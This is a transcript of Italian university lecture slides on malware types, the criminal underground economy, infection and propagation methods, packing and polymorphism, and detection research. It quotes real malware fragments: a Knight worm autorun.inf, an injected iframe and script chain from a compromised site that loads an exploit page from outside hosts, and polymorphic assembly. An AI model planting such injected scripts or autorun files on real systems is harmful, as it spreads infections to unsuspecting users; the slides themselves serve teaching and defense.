Malware e underground economy

Commenti

Transcript

Malware e underground economy
Malware e underground economy
Roberto Paleari
[email protected]
Università degli Studi di Milano
Introduzione
R. Paleari, A. Fattori
Malware e underground economy
2
Malware
Sequenza di codice progettata per danneggiare
intenzionalmente un sistema, i dati che contiene o
comunque alterare il suo normale funzionamento,
all’insaputa dell’utente
R. Paleari, A. Fattori
Malware e underground economy
3
Replicazione autonoma
No replicazione
Replicazione
Tipologie di malware
Virus
Root-kit
Worm
Dialer
Spyware
Trojan horse
Necessita ospite
Keylogger
Nessun ospite
Dipendenza da ospite
R. Paleari, A. Fattori
Malware e underground economy
4
Tipologie di malware
Virus & worm
Virus
Replicazione autonoma
Necessitano di un ospite in cui inserirsi
Propagazione attraverso la diffusione
dell’ospite
Worm
Non necessitano di un ospite
Propagazione autonoma attraverso la
rete
Capacità di propagarsi in sistemi altrui
sfruttando delle vulnerabilità
R. Paleari, A. Fattori
Malware e underground economy
5
Tipologie di malware
Virus & worm
Virus
Replicazione autonoma
Necessitano di un ospite in cui inserirsi
Propagazione attraverso la diffusione
dell’ospite
Riproduzione
Worm
Payload
Infezione
Non necessitano di un ospite
Propagazione autonoma attraverso la
rete
Capacità di propagarsi in sistemi altrui
sfruttando delle vulnerabilità
R. Paleari, A. Fattori
Malware e underground economy
5
Tipologie di malware
Trojan horse & backdoor
Trojan horse
Funzionalità maligne cammuffate tra altre benigne
Propagazione manuale: diffusione di applicazioni con funzionalità
“secondarie” o inserimento di nuove funzionalità in applicazioni esistenti
Rientrano in questa categoria adware e spyware
R. Paleari, A. Fattori
Malware e underground economy
6
Tipologie di malware
Trojan horse & backdoor
Trojan horse
Funzionalità maligne cammuffate tra altre benigne
Propagazione manuale: diffusione di applicazioni con funzionalità
“secondarie” o inserimento di nuove funzionalità in applicazioni esistenti
Rientrano in questa categoria adware e spyware
Backdoor
Per assicurare l’accesso ad un sistema compromesso
Rientrano in questa categoria i RAT (Remote Access Trojan)
R. Paleari, A. Fattori
Malware e underground economy
6
Tipologie di malware
Trojan horse & backdoor
Trojan horse
Funzionalità maligne cammuffate tra altre benigne
Propagazione manuale: diffusione di applicazioni con funzionalità
“secondarie” o inserimento di nuove funzionalità in applicazioni esistenti
Rientrano in questa categoria adware e spyware
Backdoor
Per assicurare l’accesso ad un sistema compromesso
Rientrano in questa categoria i RAT (Remote Access Trojan)
Root-kit
Strumenti utilizzati per mantenere l’accesso ad un sistema compromesso
senza fare nascere sospetti
Utilizzati per nascondere file, processi, connessioni di rete, . . .
Sia a livello kernel che a livello utente
R. Paleari, A. Fattori
Malware e underground economy
6
Nuove minacce
1800000
1600000
Number of new threats
1400000
1200000
1000000
800000
600000
400000
200000
0
J
n-
Ja
un
un
ec
l-D
Ju
J
n-
Ja
un
ec
l-D
Ju
J
n-
Ja
09
20
08
20
08
20
07
20
07
20
Period
Fonte: Symantec
R. Paleari, A. Fattori
Malware e underground economy
7
Malware & underground
economy
R. Paleari, A. Fattori
Malware e underground economy
8
Phishing
R. Paleari, A. Fattori
Malware e underground economy
9
Phishing
R. Paleari, A. Fattori
Malware e underground economy
9
Scam
R. Paleari, A. Fattori
Malware e underground economy
10
Come funziona?
1. Campagna di spam
R. Paleari, A. Fattori
Malware e underground economy
11
Come funziona?
1. Campagna di spam
2. Social engineering
GET /...
R. Paleari, A. Fattori
Malware e underground economy
11
Come funziona?
1. Campagna di spam
2. Social engineering
3. Furto credenziali & malware
R. Paleari, A. Fattori
Malware e underground economy
11
Come funziona?
1. Campagna di spam
2. Social engineering
3. Furto credenziali & malware
4. Infezione macchine
R. Paleari, A. Fattori
Malware e underground economy
11
Underground economy
Vendita informazioni rubate
Goods & services
Bank accounts
Credit cards
Full identities
Online auction site accounts
Scams
Mailers
Email addresses
Email passwords
Drop (request or offer)
Proxies
Percentage
22%
13%
9%
7%
7%
6%
5%
5%
5%
5%
Range of prices
$10-$1000
$0.40-$20
$1-$15
$1-$8
$2.50-$50/week (hosting)
$1-$10
$0.83/MB-$10/MB
$4-$30
10%-20% of drop amount
$1.50-$30
Fonte: Symantec
R. Paleari, A. Fattori
Malware e underground economy
12
Underground economy
Furto credenziali – Portata del fenomeno
Università di Mannheim – Limbo & ZeuS
∼ 70 dropzone
33 GB di dati
11000 account bancari, 150000 account mail
Dropzone
webpinkXXX.cn
coXXX-google.cn
77.XXX.159.202
finXXXonline.com
Other
Total
# Machines
26,150
12,460
10,394
6,932
108,122
164,058
Data amount
1.5 GB
1.2 GB
503 MB
438 MB
24.4 GB
28.0 GB
Country
China
Malaysia
Russia
Estonia
Fonte: Learning More About the Underground Economy – T. Holz, M. Engelberth, F. Freiling, 2008
R. Paleari, A. Fattori
Malware e underground economy
13
Underground economy
“Malware as a service”
Bot in affitto (∼ $1000-$2000/mese)
MPACK: exploit toolkit a ∼ $1000
R. Paleari, A. Fattori
Malware e underground economy
14
Underground economy
The spam business
CAPTCHA?
OCR, Fuzzy OCR, . . .
R. Paleari, A. Fattori
Malware e underground economy
15
Underground economy
The spam business
CAPTCHA?
OCR, Fuzzy OCR, . . .
Soluzioni migliori?
R. Paleari, A. Fattori
Malware e underground economy
15
Underground economy
The spam business
CAPTCHA?
OCR, Fuzzy OCR, . . .
Soluzioni migliori?
“Human computation”!
> 100K captcha al giorno, $1.5-$8 per 1000 captcha
R. Paleari, A. Fattori
Malware e underground economy
15
Underground economy
The spam business
CAPTCHA?
OCR, Fuzzy OCR, . . .
Soluzioni migliori?
“Human computation”!
R. Paleari, A. Fattori
Malware e underground economy
15
Funzionalità del malware
Non solo spam. . .
Mass-mailing (Sobig)
HTTP/SOCKS proxy (MyDoom)
SMTP proxy (Taripox, Happy99)
Diffusione tramite IM (Peacomm)
R. Paleari, A. Fattori
Malware e underground economy
16
Funzionalità del malware
Furto credenziali
Obiettivi
Credenziali account bancari/posta
Serial prodotti commerciali (Agobot)
E-mail harvesting
Come?
Installazione plugin BHO/XUL
Modifica C:\Windows\...\etc\hosts
Keylogging
Screen grabbing
R. Paleari, A. Fattori
Malware e underground economy
17
Funzionalità del malware
Click fraud
Google: 10% dei “click” sono fraudolenti (∼ $1B)
Clickbot.A (∼ 50k host infetti)
Molti “clickbot” commerciali
ClickJacking
R. Paleari, A. Fattori
Malware e underground economy
18
Funzionalità del malware
Anti-anti-virus
Kill processi in esecuzione
Vari hook per auto-start prima dell’AV
Impedire aggiornamento AV
Corruzione DB signature
Kernel-level callback via PsSetLoadImageNotifyRoutine()
...
R. Paleari, A. Fattori
Malware e underground economy
19
Funzionalità del malware
Botnet
. . . argomento della prossima lezione
R. Paleari, A. Fattori
Malware e underground economy
20
Tecniche di infezione
File/device infection
File infection
Tecnicamente complesso con PE
Virut → EPO file infector
Entry
Programma
Infezione
Programma
Virus
R. Paleari, A. Fattori
Malware e underground economy
Entry
21
Tecniche di infezione
File/device infection
File infection
Infezione device removibili
Knight: autorun.inf
[autorun]
open=Knight.exe open
icon=Knight.exe,0
shellexecute=Knight.exe open
shell=auto
action=Disk Knight(Protection Against Mobile Disk Viruses)
shell\auto=&Auto
shell\auto\command=Knight.exe open
shell\open=&Open
shell\open\command=Knight.exe open
shell\explore=E&xplore
shell\explore\command=Knight.exe open
shell\find=S&earch...
shell\find\command=Knight.exe open
...
R. Paleari, A. Fattori
Malware e underground economy
21
Tecniche di infezione
File/device infection
Root-kit
File infection
Infezione device removibili
User vs kernel level
Obiettivo: nascondere processi, file, connessioni di rete, . . .
Hooking a diversi livelli (IDT,SSDT,DKOM,. . . )
“Attacking SMM Memory via Intel CPU Cache Poisoning” (19/3/2009)
R. Paleari, A. Fattori
EPROCESS
EPROCESS
EPROCESS
csrss.exe
malware.exe
svchost.exe
Malware e underground economy
21
Tecniche di infezione
File/device infection
Root-kit
File infection
Infezione device removibili
User vs kernel level
Obiettivo: nascondere processi, file, connessioni di rete, . . .
Hooking a diversi livelli (IDT,SSDT,DKOM,. . . )
“Attacking SMM Memory via Intel CPU Cache Poisoning” (19/3/2009)
R. Paleari, A. Fattori
EPROCESS
EPROCESS
EPROCESS
csrss.exe
malware.exe
svchost.exe
Malware e underground economy
21
Tecniche di infezione
File/device infection
File infection
Root-kit
Infezione device removibili
R. Paleari, A. Fattori
Malware e underground economy
21
Tecniche di infezione
File/device infection
File infection
Root-kit
Infezione device removibili
MBR/boot infection
Trojan.Mebroot (11/2007)
Infezione \\.\PhysicalDrive{0-15} (⇒ compresi device USB)
Root-kit, furto credenziali bancarie
“This malware is very professionally written and produced” (F-Secure)
R. Paleari, A. Fattori
Malware e underground economy
21
Tecniche di propagazione
Propagation mechanisms
File sharing executables
File transfer/email attachment
File transfer/CIFS
File sharing/P2P
Remotely exploitable vulnerability
SQL
Back door/Kuang2
Back door/SubSeven
File transfer/embedded HTTP URI/Yahoo! Messenger
Web
Percentage
40%
32%
28%
19%
17%
3%
3%
3%
2%
1%
Fonte: Symantec, 2007
R. Paleari, A. Fattori
Malware e underground economy
22
Tecniche di propagazione
Rogue Antivirus
R. Paleari, A. Fattori
Malware e underground economy
23
Tecniche di propagazione
Rogue Antivirus
R. Paleari, A. Fattori
Malware e underground economy
23
Tecniche di propagazione
Rogue Antivirus
R. Paleari, A. Fattori
Malware e underground economy
23
Tecniche di propagazione
Remote exploit + drive-by-download
R. Paleari, A. Fattori
Malware e underground economy
24
Tecniche di propagazione
Remote exploit + drive-by-download
R. Paleari, A. Fattori
Malware e underground economy
25
Tecniche di propagazione
Remote exploit + drive-by-download
Link a JS maligno nel sito
Exploit MS06-014 + MS07-004
Download keylogger/backdoor
∼ 3 giorni prima del Super Bowl!
R. Paleari, A. Fattori
Malware e underground economy
25
Tecniche di propagazione
Remote exploit + drive-by-download
R. Paleari, A. Fattori
Malware e underground economy
26
Tecniche di propagazione
Remote exploit + drive-by-download
<iframe> maligno
Download binario da you69tube.com
Information-stealing (variante di Zbot?)
Exploit PDF (overflow)
“If you screw around with Paris you might get a virus. . . ”
Commento su ZDNet
R. Paleari, A. Fattori
Malware e underground economy
26
Tecniche di propagazione
Remote exploit + drive-by-download – Un esempio “live”
Ricerca sito vulnerabile
I
I
R. Paleari, A. Fattori
Trend attuale: compromissione di siti “famosi”
Molti visitatori ⇒ molte vittime
Malware e underground economy
27
Tecniche di propagazione
Remote exploit + drive-by-download – Un esempio “live”
Ricerca sito vulnerabile
I
I
Trend attuale: compromissione di siti “famosi”
Molti visitatori ⇒ molte vittime
Compromissione sito (SQLI)
R. Paleari, A. Fattori
Malware e underground economy
27
Tecniche di propagazione
Remote exploit + drive-by-download – Un esempio “live”
Ricerca sito vulnerabile
I
I
Trend attuale: compromissione di siti “famosi”
Molti visitatori ⇒ molte vittime
Compromissione sito (SQLI)
R. Paleari, A. Fattori
Malware e underground economy
27
Tecniche di propagazione
Remote exploit + drive-by-download – Un esempio “live”
Ricerca sito vulnerabile
I
I
Trend attuale: compromissione di siti “famosi”
Molti visitatori ⇒ molte vittime
Compromissione sito (SQLI)
h.js
document . w r i t e ( ”<i f r a m e s r c =’ h t t p : / / . . . / 0 5 0 0 a d m i n /News/ f a q . htm’></ i f r a m e >” ) ;
document . w r i t e ( ”<i f r a m e s r c =’ h t t p : / / . . . / i . htm’></ i f r a m e >” ) ;
faq.htm
<i f r a m e s r c=h t t p : / / . . . / i . htm w i d t h =100 h e i g h t =0></ i f r a m e>
<s c r i p t s r c=” h t t p : / / c o u n t 4 9 . 5 1 y e s . com/ c l i c k . a s p x ? i d =494953024& l o g o =11”></ s c r i p t>
i.htm
<s c r i p t> . . . e x p l o i t . . .</ s c r i p t>
<s c r i p t s r c=” h t t p : / / c o u n t 4 8 . 5 1 y e s . com/ c l i c k . a s p x ? i d =480917198& l o g o =1”></ s c r i p t>
R. Paleari, A. Fattori
Malware e underground economy
27
Tecniche di propagazione
Remote exploit + drive-by-download – Un esempio “live”
Ricerca sito vulnerabile
I
I
Trend attuale: compromissione di siti “famosi”
Molti visitatori ⇒ molte vittime
Compromissione sito (SQLI)
. . . aspettare . . .
R. Paleari, A. Fattori
Malware e underground economy
27
Soluzioni?
R. Paleari, A. Fattori
Malware e underground economy
28
Soluzioni?
R. Paleari, A. Fattori
Malware e underground economy
28
Situazione attuale
Malware vs AV
AV in posizione svantaggiata
The amount of new malware has never been higher. Our
labs are receiving an average of 25,000 malware samples
every day, seven days a week.
F-Secure, 2008
R. Paleari, A. Fattori
Malware e underground economy
29
Perchè una cosı́ grande diffusione?
Omogeneità, connettività e configurazione
R. Paleari, A. Fattori
Malware e underground economy
30
Perchè una cosı́ grande diffusione?
Omogeneità, connettività e configurazione
Scarsa attenzione
R. Paleari, A. Fattori
Malware e underground economy
30
Perchè una cosı́ grande diffusione?
Omogeneità, connettività e configurazione
Scarsa attenzione
Incentivo economico
R. Paleari, A. Fattori
Malware e underground economy
30
Situazione malware detector
Signature-based detectors
Fonte: Testing Malware Detectors – M. Christodorescu, S. Jha, 2004
R. Paleari, A. Fattori
Malware e underground economy
31
Situazione malware detector
. . . qualche dato più recente
Rank
1
2
3
4
5
6
7
8
9
10
Detected
91%
91%
90%
90%
90%
89%
88%
88%
87%
87%
Missed
178
179
194
195
202
213
241
247
259
268
Product
Sophos
AntiVir
Microsoft
AVG
Ikarus
BitDefender
Norman
TrendMicro
Kaspersky
F-Secure
Fonte: SRI International + VirusTotal, campione di 2064 malware
R. Paleari, A. Fattori
Malware e underground economy
32
Tecniche di self-defense
Packing
Codice maligno nascosto da 1+ layer di compressione/cifratura
Decompressione/decrifratura a runtime
R. Paleari, A. Fattori
Malware e underground economy
33
Tecniche di self-defense
Packing
Codice maligno nascosto da 1+ layer di compressione/cifratura
Decompressione/decrifratura a runtime
Malicious
code
R. Paleari, A. Fattori
Malware e underground economy
33
Tecniche di self-defense
Packing
Codice maligno nascosto da 1+ layer di compressione/cifratura
Decompressione/decrifratura a runtime
Unpacking
routine
R. Paleari, A. Fattori
Malicious
code
Malware e underground economy
33
Tecniche di self-defense
Packing
Codice maligno nascosto da 1+ layer di compressione/cifratura
Decompressione/decrifratura a runtime
Unpacking Unpacking
routine
routine
R. Paleari, A. Fattori
Malicious
code
Malware e underground economy
33
Tecniche di self-defense
Packing
Codice maligno nascosto da 1+ layer di compressione/cifratura
Decompressione/decrifratura a runtime
Unpacking Unpacking
routine
routine
Malicious
code
Problema
∼ 80% del malware è “packed”
200 famiglie di packer, 2000 varianti
Backlog di ∼ 90 famiglie
Fonte: Symantec, 2008
R. Paleari, A. Fattori
Malware e underground economy
33
Tecniche di self-defense
Polimorfismo
Ancora corpo cifrato
Il malware è in grado di mutare la routine di cifratura
Esempio
lea
si , corpo virus
nop
mov
sp , 0682 h
sub ax, bx
ciclo :
xor
[ si ] , si
inc cx
xor
[ s i ] , sp
inc
si
add bx, cx
dec
sp
jnz
ciclo
corpo virus :
...
R. Paleari, A. Fattori
Le istruzioni evidenziate sono
“junk code”
Possibile anche instruction
reordering, instruction
substitution, register
replacement, . . .
Elevato numero di mutazioni
possibili
Difficile individuare una
signature costante
Malware e underground economy
34
Tecniche di self-defense
Metamorfismo
“Metamorphics are body-polymorphics” (Igor Muttik)
W95/Regswap
5A
BF04000000
8BF5
B80C000000
81 C288000000
8B1A
pop
mov
mov
mov
add
mov
edx
edi ,0004 h
e s i , ebp
eax , 0 0 0 Ch
edx , 0 0 8 8 h
ebx , [ edx ]
58
BB04000000
8BD5
BF0C000000
81 C088000000
8B30
pop
mov
mov
mov
add
mov
eax
ebx , 0 0 0 4 h
edx , ebp
e d i , 0 0 0 Ch
eax , 0 0 8 8 h
e s i , [ eax ]
W32/Evol
BF0F000055
893E
5F
52
B640
BA8BEC5151
53
8BDA
895 E04
R. Paleari, A. Fattori
mov
mov
pop
push
mov
mov
push
mov
mov
e d i , 5 5 0 0 0 0 0 Fh
[ esi ] , edi
edi
edx
dh , 4 0
edx , 5 1 5 1 EC8Bh
ebx
ebx , edx
[ e s i + 00 0 4 ] , ebx
BB0F000055
891E
5B
51
B9CB00C05F
81 C1C0EB91F1
894 E04
mov
mov
pop
push
mov
add
mov
Malware e underground economy
ebx , 5 5 0 0 0 0 0 Fh
[ e s i ] , ebx
ebx
ecx
ecx , 5 FC000CBh
ecx , F191EBC0h
[ e s i + 0 00 4 ] , e c x
35
Tecniche di self-defense
Implementazione difficile?
R. Paleari, A. Fattori
Malware e underground economy
36
Tecniche di self-defense
Implementazione difficile?
R. Paleari, A. Fattori
Malware e underground economy
36
Next-generation malware detector
Situazione attuale: Algorithmic unpacking
Malware detector
Malicious program
R. Paleari, A. Fattori
Malware e underground economy
37
Next-generation malware detector
Situazione attuale: Algorithmic unpacking
Malware detector
Malicious program
R. Paleari, A. Fattori
????
Malware e underground economy
37
Next-generation malware detector
Situazione attuale: Algorithmic unpacking
Malware detector
Malicious program
????
????
R. Paleari, A. Fattori
Malware e underground economy
37
Next-generation malware detector
Situazione attuale: Algorithmic unpacking
Malware detector
Malicious program
????
????
R. Paleari, A. Fattori
Malware e underground economy
Malicious
37
Next-generation malware detector
Situazione attuale: Algorithmic unpacking
Malware detector
Malicious program
????
????
Malicious
Problemi
Ogni packer richiede un unpacker specifico
Troppe famiglie di packer
Symantec: da 6 ore a 6 mesi per packer
Multi-layer packing
R. Paleari, A. Fattori
Malware e underground economy
37
Next-generation malware detector
Unpacking generico
Idea
Analisi dinamica
Emulazione/tracing dell’esecuzione fino al termine della routine
di unpacking
R. Paleari, A. Fattori
Malware e underground economy
38
Next-generation malware detector
Unpacking generico
Idea
Analisi dinamica
Emulazione/tracing dell’esecuzione fino al termine della routine
di unpacking
Packed code
R. Paleari, A. Fattori
Malware e underground economy
38
Next-generation malware detector
Unpacking generico
Idea
Analisi dinamica
Emulazione/tracing dell’esecuzione fino al termine della routine
di unpacking
Packed code
R. Paleari, A. Fattori
Malware e underground economy
38
Next-generation malware detector
Unpacking generico
Idea
Analisi dinamica
Emulazione/tracing dell’esecuzione fino al termine della routine
di unpacking
Packed code
R. Paleari, A. Fattori
Malware e underground economy
38
Next-generation malware detector
Unpacking generico
Idea
Analisi dinamica
Emulazione/tracing dell’esecuzione fino al termine della routine
di unpacking
Packed code
R. Paleari, A. Fattori
Malware e underground economy
38
Next-generation malware detector
Unpacking generico
Idea
Analisi dinamica
Emulazione/tracing dell’esecuzione fino al termine della routine
di unpacking
Unpacked
code
Packed code
Un po’ di nomi. . .
OmniUnpack
Renovo
Justin
PolyUnpack
R. Paleari, A. Fattori
Malware e underground economy
38
Next-generation malware detector
Analisi comportamentale
Signature-based detection è troppo debole
⇒ verso tecniche più “semantiche”
R. Paleari, A. Fattori
Malware e underground economy
39
Next-generation malware detector
Analisi comportamentale
Signature-based detection è troppo debole
⇒ verso tecniche più “semantiche”
Soluzioni
Analisi dinamica
Granularità a livello di system call
NovaShield, ThreatFire, Sana Security, . . .
Problemi
Performance
Falsi positivi
Information leakage
...
R. Paleari, A. Fattori
Malware e underground economy
39
Remediation
Detection non è sempre possibile
Remediation dell’infezione
. . . ma funziona?
R. Paleari, A. Fattori
Malware e underground economy
40
Remediation
Detection non è sempre possibile
Remediation dell’infezione
. . . ma funziona?
R. Paleari, A. Fattori
Malware e underground economy
40
Malware & underground economy
Domande?
Roberto Paleari [email protected]
Università degli Studi di Milano
R. Paleari, A. Fattori
Malware e underground economy
41

Documenti analoghi

lezione 22 - malware

lezione 22 - malware Il modo in cui i worm si diffondono è più complesso di quello dei virus e dei trojan horse. In particolare, i worm sono in grado di diffondersi da un sistema all'altro in modo del tutto autonomo, i...

Dettagli